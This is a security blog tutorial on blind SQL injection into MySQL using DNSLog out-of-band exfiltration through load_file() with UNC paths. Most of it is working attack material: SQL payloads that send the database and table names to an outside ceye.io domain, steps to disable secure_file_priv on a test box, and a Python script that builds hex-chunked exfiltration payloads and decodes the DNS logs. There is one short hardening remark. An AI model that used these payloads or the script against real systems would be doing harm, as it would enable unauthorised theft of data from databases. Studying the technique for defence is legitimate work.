MySQL DNSLog out-of-band injection

When an injection point returns no output at all (blind injection), DNSLog out-of-band injection can be tried: the injected query makes the database server resolve a hostname under a domain you control, and the value you want to leak travels inside that hostname.

MySQL DNSLog out-of-band injection relies on the load_file() function. Two preconditions must hold: the current database user needs the FILE privilege (check with SHOW GRANTS), and secure_file_priv must be set so that load_file() is allowed. The trick works by handing load_file() a UNC path of the form \\host\share\file; only a MySQL server running on Windows will try to resolve that host name (and so emit the DNS query). On Linux the same string is just a non-existent local path and no lookup happens.

C:\phpStudy\PHPTutorial\MySQL\bin>mysql -uroot -p
Enter password: ****
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 138
Server version: 5.5.53 MySQL Community Server (GPL)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

 

1. secure_file_priv is NULL: file import and export (load_file(), LOAD DATA, SELECT ... INTO OUTFILE) are not allowed at all.
2. secure_file_priv names a directory: import and export are limited to that directory, so a UNC path is rejected too.
3. secure_file_priv is empty: there is no restriction.

The test box below shows NULL, which blocks load_file(); for the test it is set to empty.

mysql> show variables like '%secure%';
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_auth      | OFF   |
| secure_file_priv | NULL  |
+------------------+-------+
2 rows in set (0.02 sec)

mysql>

Windows: edit my.ini and add secure_file_priv= under [mysqld].

Linux: edit my.cnf and add secure_file_priv= under [mysqld].

Restart MySQL; the variable then shows an empty value and the setting is in effect. The restart is required because secure_file_priv is read-only at runtime and cannot be changed with SET GLOBAL. For hardening the direction is the opposite: leave it at NULL, or point it at a dedicated directory, so load_file() can neither read arbitrary files nor be turned into a DNS channel.

Self-hosted DNSLog platform: https://github.com/BugScanTeam/DNSLog

Online platform: http://ceye.io/

The online platform is used here.

 

 

Payload (leaks the current database name; %23 is the URL-encoded # that comments out the rest of the query, and the four backslashes inside the SQL string literal become the \\ prefix of the UNC path):
id=1' and (select load_file(concat('\\\\',(select database()),'.xxxxxx.ceye.io\\abc')))%23

Query the tables (one table name per request, stepping the LIMIT offset):
id=1' and (select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 1),'.xxxxx.ceye.io\\abc')))%23
id=1' and (select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 1,1),'.xxxxx.ceye.io\\abc')))%23

The leaked value shows up as the first label of the hostname in the DNSLog panel. A DNS label is at most 63 bytes and a hostname tolerates only a narrow character set, so longer values, or values containing spaces or punctuation, have to be wrapped in hex() and split with substring() across several requests.
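The enumeration above is done by hand, one payload per request. The following Python script is an added example, not code from the original post: it builds the same load_file() payloads with hex() and substring() so that long or odd values survive as DNS labels, and it decodes what the DNSLog platform records back into the leaked values. The DNSLog domain is a placeholder, the label layout <hex>.<tag>.c<chunk>.<domain> is this example's own convention, and SAMPLE_RECORDS is constructed data standing in for a real capture.

```python
"""
Added example (not code from the original post): a payload builder for
MySQL load_file() DNSLog exfiltration plus a decoder for the DNSLog records.
Assumptions not taken from the post: the DNSLog domain is a placeholder,
the label layout <hex>.<tag>.c<chunk>.<domain> is our own convention, and
SAMPLE_RECORDS is constructed data, not a real capture.
"""
import re
from urllib.parse import quote

DNSLOG_DOMAIN = "xxxxxx.ceye.io"   # placeholder, replace with your own DNSLog domain
LABEL_MAX = 63                     # one DNS label is at most 63 bytes (RFC 1035)


def oob_payload(inner_query: str, tag: str, chunk: int = 0,
                domain: str = DNSLOG_DOMAIN) -> str:
    r"""
    One injected value in the shape used in the post:
        1' and (select load_file(concat('\\\\', <value>, '.<domain>\\abc')))#
    Added on top of the post's raw payload: HEX() turns the value into
    [0-9A-F] so spaces, dots or non-ASCII cannot break the hostname,
    SUBSTRING() keeps each label inside 63 bytes (one chunk per request),
    and a tag plus chunk index let the log be reassembled.  The DNS query
    only fires when MySQL runs on Windows and resolves the UNC host.
    """
    offset = chunk * LABEL_MAX + 1     # SUBSTRING is 1-based
    host = (rf"concat('\\\\', substring(hex(({inner_query})),{offset},{LABEL_MAX}),"
            rf"'.{tag}.c{chunk}.{domain}\\abc')")
    return f"1' and (select load_file({host}))#"


def as_get_param(payload: str, name: str = "id") -> str:
    """URL-encode for a GET parameter; the trailing '#' must travel as %23."""
    return f"{name}={quote(payload, safe='')}"


def enumeration_payloads(domain: str = DNSLOG_DOMAIN, tables: int = 2,
                         chunks: int = 2) -> dict:
    """The post's sequence: database name, then table names by LIMIT offset,
    one request per chunk.  Chunks past the end of a value carry an empty
    label and never appear as a decodable record."""
    queries = {"db": "select database()"}
    for i in range(tables):
        queries[f"t{i}"] = ("select table_name from information_schema.tables "
                            f"where table_schema=database() limit {i},1")
    return {f"{tag}.c{c}": oob_payload(q, tag, c, domain)
            for tag, q in queries.items() for c in range(chunks)}


def server_side_lookups(value: str, tag: str, domain: str = DNSLOG_DOMAIN) -> list:
    """What MySQL's concat(...) evaluates to for a leaked value, i.e. the
    hostnames the DNSLog platform would record.  Stands in for a real server
    so the example runs offline."""
    h = value.encode("utf-8").hex().upper()        # MySQL HEX() is upper-case
    parts = [h[i:i + LABEL_MAX] for i in range(0, len(h), LABEL_MAX)]
    return [f"{p}.{tag}.c{n}.{domain}" for n, p in enumerate(parts)]


def decode_dnslog(records, domain: str = DNSLOG_DOMAIN) -> dict:
    """Reassemble leaked values from DNSLog hostnames.  Resolvers retry and
    may change case, so duplicates collapse on (tag, chunk); unrelated
    lookups are skipped; a tag whose chunks do not form a complete value
    decodes to None so that it can be requested again."""
    pat = re.compile(r"^([0-9a-f]+)\.([a-z0-9]+)\.c(\d+)\." + re.escape(domain)
                     + r"\.?$", re.I)
    chunks = {}
    for name in records:
        m = pat.match(name.strip())
        if not m:
            continue
        chunks.setdefault(m.group(2).lower(), {})[int(m.group(3))] = m.group(1)
    out = {}
    for tag, parts in chunks.items():
        if sorted(parts) != list(range(len(parts))):
            out[tag] = None                        # a chunk was lost
            continue
        try:
            raw = bytes.fromhex("".join(parts[i] for i in range(len(parts))))
            out[tag] = raw.decode("utf-8", "replace")
        except ValueError:                         # odd hex length: last chunk missing
            out[tag] = None
    return out


# Constructed sample of what the DNSLog panel would list (not a real capture):
# the database name "testdb", a table name long enough to need two labels,
# a retried lookup in different case, and an unrelated lookup.
SAMPLE_RECORDS = (
    ["746573746462.db.c0." + DNSLOG_DOMAIN]                   # HEX('testdb')
    + server_side_lookups("very_long_table_name_for_chunk_demo", "t0")
    + ["746573746462.DB.C0." + DNSLOG_DOMAIN.upper()]         # resolver retry
    + [DNSLOG_DOMAIN]
)

if __name__ == "__main__":
    for key, p in enumeration_payloads().items():
        print(key, as_get_param(p))
    print(decode_dnslog(SAMPLE_RECORDS))
```

Running the script prints the six GET parameters to send (three queries, two chunks each) and then the dictionary recovered from the constructed log. In a real engagement the records come from the DNSLog panel; the tag and chunk index in each hostname are what make it possible to tell the answers apart when several requests resolve out of order or are retried by the resolver.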

  

 

posted on 2020-09-25 19:54 by Ra7ing安全实验室